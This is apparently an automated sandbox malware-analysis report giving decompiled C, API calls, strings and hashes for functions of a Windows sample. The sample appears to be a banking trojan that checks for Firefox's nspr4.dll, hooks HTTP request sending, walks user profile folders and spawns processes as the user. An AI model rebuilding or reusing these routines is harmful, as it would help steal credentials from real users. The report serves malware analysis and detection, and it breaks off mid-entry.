0x004125b7

APIs

RegOpenKeyExW.ADVAPI32(80000001,00423778,00000000,00000001,?,?,74B5F560,00000000), ref: 00412541

Strings

\7B, xrefs: 00412518
x7B, xrefs: 00412513

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: \7B$x7B
API String ID: 71445658-1060299144
Opcode ID: cee52ac73add73a247d6a569c2ce561b21995ff08de37a7a3c6fd802d6314bbf
Instruction ID: 87d1833207da097aee0b407269a63c5ad20d8ade6aeba6188d5e4015ba7086f1
Opcode Fuzzy Hash: cee52ac73add73a247d6a569c2ce561b21995ff08de37a7a3c6fd802d6314bbf
Instruction Fuzzy Hash: C111E171A40218B6CF20AB65DD85FEF7B7A9F013A4F108167F408B61D0C7BD4B958B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041475F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041475F(struct HINSTANCE__* __eax) {
				char _v8;
				char _v20;
				char _v108;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				void* _t18;
				signed int _t25;
				short* _t33;
				void* _t43;

				_t11 = __eax;
				_t33 = __eax;
				if( *0x423bd4 > 1) {
					_t11 = GetModuleHandleW(L"nspr4.dll");
					if(_t11 != 0) {
						if(_t33 == 0 ||  *_t33 == 0) {
							return E004144F1(__eflags, 0);
						}
						_t11 = E00406E6D(2 + E004079D4(_t33) * 4);
						_t31 = _t11;
						if(_t11 != 0) {
							_t25 = E00407CDC(E00407D91(_t33, _t31) | 0xffffffff, _t31,  &_v20);
							_t11 = E00406E85(_t31);
							if(_t25 != 0) {
								_t18 = 0x31;
								E00405ACA(_t18,  &_v108);
								_t6 =  &_v8; // 0x412a34
								_t43 = E00407C49(_t6,  &_v108, _v20);
								_t11 = E00407CCA( &_v20);
								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
									_t9 =  &_v8; // 0x412a34
									E004144F1(_t44,  *_t9);
									return E00406E85(_v8);
								}
							}
						}
					}
				}
				return _t11;
			}

0x0041475f
0x0041476f
0x00414771
0x0041477c
0x00414784
0x0041478c
0x00000000
0x0041480e
0x004147a2
0x004147a7
0x004147ab
0x004147c4
0x004147c6
0x004147cd
0x004147d4
0x004147d5
0x004147e0
0x004147ec
0x004147f1
0x004147f6
0x004147f8
0x004147fa
0x004147fd
0x00000000
0x00414805
0x004147f8
0x004147cd
0x004147ab
0x00414784
0x00414817

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 0041477C

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Part of subcall function 004144F1: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00414518
Part of subcall function 004144F1: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041456C
Part of subcall function 004144F1: GetPrivateProfileIntW.KERNEL32 ref: 004145CF
Part of subcall function 004144F1: GetPrivateProfileStringW.KERNEL32 ref: 004145FB

Strings

4*A, xrefs: 004147E0, 004147FA, 004147E3
nspr4.dll, xrefs: 00414777

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
String ID: 4*A$nspr4.dll
API String ID: 119068519-2715847660
Opcode ID: 4c3c916a6ffdca68ea9e1f0646becbada49e403290f1aa60f67a431b648ccebb
Instruction ID: a3888d5cbdeeeaecb781db45b67cc6614bb4e67edf723622deba3b7787aaffa7
Opcode Fuzzy Hash: 4c3c916a6ffdca68ea9e1f0646becbada49e403290f1aa60f67a431b648ccebb
Instruction Fuzzy Hash: 9E11E335E002546AEB2177BA9C027EE77699FC0B44F08403BF801B32E6DB7C9D848299

Uniqueness

Uniqueness Score: -1.00%

Function 00418CA8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00418CA8(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E00405B00(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00406F38( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040C5AE( &_v572,  &_v16, _t37, 1, 2, E00418A0D,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00406E85(_v12);
				}
				return E00416CBC(_t29, _v12, 0xcb);
			}

0x00418cb3
0x00418cbb
0x00418cc4
0x00418cce
0x00418cd5
0x00418cdc
0x00418ce3
0x00418ce8
0x00418cea
0x00418cea
0x00418cf8
0x00418cfe
0x00418d00
0x00418d12
0x00418d1b
0x00418d1b
0x00418d20
0x00418d21
0x00418d29
0x00000000
0x00418d42
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00418CF8

Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

&, xrefs: 00418CCE
#, xrefs: 00418CDC

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 2c85fbde6590643331e1ae873c28b813139d4189f7727ad630e6ddb1917396cd
Instruction ID: de68c4486bc0f50377f406a7e632938b55bb66278a2a036bebcf459e8be7e9a3
Opcode Fuzzy Hash: 2c85fbde6590643331e1ae873c28b813139d4189f7727ad630e6ddb1917396cd
Instruction Fuzzy Hash: F7115E76A01228BADB20AB96DC09FDF7A79EF41344F00416AB505B6180DB785B86CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004195C9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004195C9(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E00405B00(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00406F38( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040C5AE( &_v580,  &_v16, _t37, 1, 2, E0041933A,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00406E85(_v12);
				}
				return E00416CBC(_t29, _v12, 0xcb);
			}

0x004195d4
0x004195dc
0x004195e5
0x004195ef
0x004195f6
0x004195fd
0x00419604
0x00419609
0x0041960b
0x0041960b
0x00419619
0x0041961f
0x00419621
0x00419633
0x0041963c
0x0041963c
0x00419641
0x00419642
0x0041964a
0x00000000
0x00419663
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419619

Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

&, xrefs: 004195EF
#, xrefs: 004195FD

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 40a10c756f0eead891361828f848d19ebaf898b36ca40d84b786715c17e6d6b5
Instruction ID: c86ea3206bbd780e0a150e6185af3eebba036b9bc12448631b4d985f2f3524ed
Opcode Fuzzy Hash: 40a10c756f0eead891361828f848d19ebaf898b36ca40d84b786715c17e6d6b5
Instruction Fuzzy Hash: 42117075A01128BADB209B96DC49FDFBF7CEF41754F00406AFA05B6180D2785A85CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC8A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041CC8A(void* __ecx, void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
				char _v20;
				char _v24;
				long _v32;
				char* _v36;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _GOPHER_FIND_DATAA _t22;
				int _t23;
				void* _t30;
				intOrPtr _t31;

				_t30 = __ecx;
				if(E00412FEE() == 0) {
					_t22 = _a8;
					L9:
					_t23 = HttpSendRequestExA(_a4, _t22, _a12, _a16, _a20);
					L10:
					return _t23;
				}
				_push(0x28);
				_t39 = _a8;
				if(_a8 != 0) {
					_push(_a8);
					_push( &_v44);
					E00406EC1();
					__eflags = _v44;
					if(__eflags != 0) {
						__eflags = _v36;
						if(__eflags != 0) {
							HttpAddRequestHeadersA(_a4, _v36, _v32, 0xa0000000);
							_v52 = 0;
							_v48 = 0;
						}
					}
				} else {
					_pop(_t31);
					E00406F38( &_v44,  &_v44, 0, _t31);
					_v56 = _t31;
				}
				_t23 = E0041C91F(_t30, _t39, _a4,  &_v24,  &_v20);
				if(_t23 != 0xffffffff) {
					goto L10;
				} else {
					_t22 =  &_v44;
					goto L9;
				}
			}

0x0041cc8a
0x0041cc9b
0x0041cd09
0x0041cd0c
0x0041cd19
0x0041cd1f
0x0041cd23
0x0041cd23
0x0041cc9f
0x0041cca5
0x0041cca8
0x0041ccb9
0x0041ccbc
0x0041ccbd
0x0041ccc2
0x0041ccc6
0x0041ccc8
0x0041cccc
0x0041ccde
0x0041cce4
0x0041cce8
0x0041cce8
0x0041cccc
0x0041ccaa
0x0041ccaa
0x0041ccae
0x0041ccb3
0x0041ccb3
0x0041ccf9
0x0041cd01
0x00000000
0x0041cd03
0x0041cd03
0x00000000
0x0041cd03

APIs

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0041CCDE
HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0041CD19

Strings

0h`p, xrefs: 0041CD19

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpRequest$HeadersObjectSendSingleWait
String ID: 0h`p
API String ID: 2328130936-2723391422
Opcode ID: 589c202f75f38df9c3ca41c7851bbe349b30567e13577554cd8e6a4b121b50ce
Instruction ID: 1bc04f9ab690f8e293a24b66b680d7f0651b840fc14eaa883e7c5c70cc34b0cc
Opcode Fuzzy Hash: 589c202f75f38df9c3ca41c7851bbe349b30567e13577554cd8e6a4b121b50ce
Instruction Fuzzy Hash: F0116A31404209EBCB119F50EC408EF7FA8FB88760F10862BF95491161D735CAA5DBDA

Uniqueness

Uniqueness Score: -1.00%

Function 004134BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004134BE(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E00405B00(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E00405ACA(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E00405B00(0xd5,  &_v92);
					_push(0x1e6);
					_push("0x729B4D62");
					if(E00407BF3( &_v8, _t32, 0x7070707) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E00406E85(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x004134c5
0x004134cd
0x004134db
0x004134df
0x004134e6
0x004134ee
0x004134fd
0x00413501
0x00413536
0x00413536
0x00413555
0x00000000
0x00413555
0x00413503
0x00413507
0x0041350f
0x00413514
0x00413519
0x00413534
0x00413549
0x0041354e
0x00413553
0x00000000
0x00413553
0x00000000
0x00413534
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 004134D5
GetProcAddress.KERNEL32(00000000,?), ref: 004134F7

Strings

0x729B4D62, xrefs: 00413519

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0x729B4D62
API String ID: 1646373207-950121167
Opcode ID: dceda47abd91cc5f8bc59fc37edaf602fd2d96705f1f19eb4f657377b1122760
Instruction ID: 99f9d4dfa15c7b055542410aa908031a423bdc71755d055d0c64b1f32271d73c
Opcode Fuzzy Hash: dceda47abd91cc5f8bc59fc37edaf602fd2d96705f1f19eb4f657377b1122760
Instruction Fuzzy Hash: 3101D676E00744B7CB116AA99C06BDF3B69DB80B15F100076FE01F7281D978EF01D5A9

Uniqueness

Uniqueness Score: -1.00%

Function 004131E9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004131E9(void* __ecx, WCHAR* __edi, signed int _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
				WCHAR* _t16;
				char* _t18;
				WCHAR* _t19;

				_t19 = __edi;
				 *__edi = 0;
				E00413194(__ecx,  &_v596);
				_t12 = _a4;
				if(_t12 == 0) {
					L6:
					_t18 =  &_v178;
					goto L7;
				} else {
					_t12 = _t12 - 1;
					if(_t12 == 0) {
						_t18 =  &_v198;
						L7:
						_t16 = 0x4239c8;
						goto L8;
					} else {
						_t12 = _t12 - 1;
						if(_t12 == 0) {
							goto L6;
						} else {
							_t14 = _t12 - 1;
							if(_t14 == 0) {
								_t16 = L"SOFTWARE\\Microsoft";
								_t18 =  &_v158;
								L8:
								_t21 =  &_v108;
								_t14 = E00407090(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
								if(_t14 != 0) {
									_t14 = E0040C70A(_t21, _t19, _t16);
									if(_t14 == 0) {
										L12:
										_t14 = 0;
										 *_t19 = 0;
									} else {
										if(_a4 == 0) {
											_t14 = PathRenameExtensionW(_t19, L".dat");
											if(_t14 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t14;
			}

0x004131e9
0x004131f5
0x00413200
0x00413208
0x0041320b
0x0041322b
0x0041322b
0x00000000
0x0041320d
0x0041320d
0x0041320e
0x00413223
0x00413231
0x00413231
0x00000000
0x00413210
0x00413210
0x00413211
0x00000000
0x00413213
0x00413213
0x00413214
0x00413216
0x0041321b
0x00413236
0x0041323a
0x00413240
0x00413247
0x0041324d
0x00413254
0x0041326c
0x0041326c
0x0041326e
0x00413256
0x0041325a
0x00413262
0x0041326a
0x00000000
0x00000000
0x0041326a
0x0041325a
0x00413254
0x00413247
0x00413214
0x00413211
0x0041320e
0x00413274

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262

Strings

.dat, xrefs: 0041325C
SOFTWARE\Microsoft, xrefs: 00413216

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 205399969e23e4123cb54b74d1f549c8fad68b60afbe584b8ab74fdcfc23b97b
Instruction ID: 4edbfe2b8421f84d579018dba52f3caef0dc6151aa5e3cc3ef41ab5e4fdc523d
Opcode Fuzzy Hash: 205399969e23e4123cb54b74d1f549c8fad68b60afbe584b8ab74fdcfc23b97b
Instruction Fuzzy Hash: C8018C706102059ADF20FF749D81BEA7368AF61346F5005A7E905F22C1E73CAF80C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C201, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040C201(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E004081BE());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00407B78(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0040C70A(_t19, _a8,  &_v524) == 0 || E0040C035(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040c224
0x0040c27e
0x00000000
0x0040c27e
0x0040c226
0x0040c228
0x0040c228
0x0040c230
0x0040c231
0x0040c240
0x0040c246
0x0040c24b
0x0040c251
0x00000000
0x00000000
0x0040c266
0x0040c278
0x0040c27c
0x00000000
0x00000000
0x00000000
0x0040c286
0x00000000
0x0040c286
0x0040c266
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040C218

Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

Part of subcall function 0040C035: CreateFileW.KERNEL32(0040895F,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C04F
Part of subcall function 0040C035: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C072
Part of subcall function 0040C035: CloseHandle.KERNEL32(00000000,?,0040C274,0040895F,00000000,00000000,0040895F,?), ref: 0040C07F

Strings

%s%08x.%s, xrefs: 0040C236
tmp, xrefs: 0040C231

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: a684c462db1f4b90f6eccd4e67bda00e08631f9e68a21bd12b4069c6ccb209d5
Instruction ID: 321ec92223b5c1eb998e88019a0864bd68a66da4e3e4e0b01975055c0ed656b5
Opcode Fuzzy Hash: a684c462db1f4b90f6eccd4e67bda00e08631f9e68a21bd12b4069c6ccb209d5
Instruction Fuzzy Hash: 43014971940214B6DF2037A49C85FEB3719DB42354F1003BBFE60B65E1C6799E8AD69C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA59, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AA59(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0040C1E0( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00407004(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E00406EC1(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x0040aa6d
0x0040aa83
0x0040aa9d
0x0040aaa3
0x0040aab7
0x0040aac4
0x0040aacb
0x0040aacf
0x0040aad0
0x0040aad5

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040AA7B

Part of subcall function 0040C1E0: SetFileAttributesW.KERNEL32(00000080,00000080,00414759,?), ref: 0040C1E9
Part of subcall function 0040C1E0: DeleteFileW.KERNEL32(?), ref: 0040C1F3

PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040AA9D

Part of subcall function 00407004: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00407CFC,00000000,00000000,00000000,00407061,00000000,00000000,00000000,?,00000000), ref: 0040701F

Strings

cab, xrefs: 0040AA70

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: ee95de48f592c4358e66f7ad4c48418422b647a1aa91e54deaf77f6cff0f152a
Instruction ID: 35b0fac01b63a355821587bb3daf25a01ba2b4008c94ea4b546794103305f32d
Opcode Fuzzy Hash: ee95de48f592c4358e66f7ad4c48418422b647a1aa91e54deaf77f6cff0f152a
Instruction Fuzzy Hash: 7B01D676A0031467CB209B68CC4AFCB77AC9F49764F000362BA65F31D2DA78E9448AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A4A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00415A4A(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E0040A574(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00407BF3( &_a4, L"\"%s\"", _a16) > 0) {
								E004087A7(_t27, _a4);
								E00406E85(_a4);
							}
						}
						E00406E85(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x00415a54
0x00415a59
0x00415a64
0x00415a68
0x00415a77
0x00415a7d
0x00415a93
0x00415a99
0x00415aa1
0x00415aa1
0x00415aa6
0x00415aa8
0x00415aa8
0x00000000
0x00415ab6
0x00415ab8

APIs

Part of subcall function 0040A574: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,004084BE,?,?,?,00412CDF,000000FF,00423978), ref: 0040A58D
Part of subcall function 0040A574: GetLastError.KERNEL32(?,?,004084BE,?,?,?,00412CDF,000000FF,00423978,?,?,00000000), ref: 0040A593
Part of subcall function 0040A574: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,004084BE,?,?,?,00412CDF,000000FF,00423978), ref: 0040A5B9

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415A6F

Part of subcall function 004087A7: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004087B8
Part of subcall function 004087A7: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004087D7
Part of subcall function 004087A7: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 004087E3
Part of subcall function 004087A7: CreateProcessAsUserW.ADVAPI32(?,00000000,00415A9E,00000000,00000000,00000000,00415A9E,00415A9E,00000000,?,?,?,00000000,00000044), ref: 00408854
Part of subcall function 004087A7: CloseHandle.KERNEL32(?), ref: 00408867
Part of subcall function 004087A7: CloseHandle.KERNEL32(?), ref: 0040886C
Part of subcall function 004087A7: FreeLibrary.KERNEL32(?), ref: 00408883

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

CloseHandle.KERNEL32(?,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415AB0

Strings

"%s", xrefs: 00415A83

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 452eb548b03f139ff93d7d8e9afed597ea69144bb243d1e91b2b593385a542d4
Instruction ID: 8030f3e327fc6ebeac315f18cb7666adaec022fe4c93b6fff034a576fc469303
Opcode Fuzzy Hash: 452eb548b03f139ff93d7d8e9afed597ea69144bb243d1e91b2b593385a542d4
Instruction Fuzzy Hash: 1BF06D35500109BBCF116F21ED45DDF3F69AF80390B048136BC0CE6161DB39DA60DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

getpeername.WS2_32(000000FF,00000000,00000000), ref: 00406B14
getsockname.WS2_32(000000FF,00000000,00000000), ref: 00406B23

Strings

BAA, xrefs: 00406AF0

Memory Dump Source

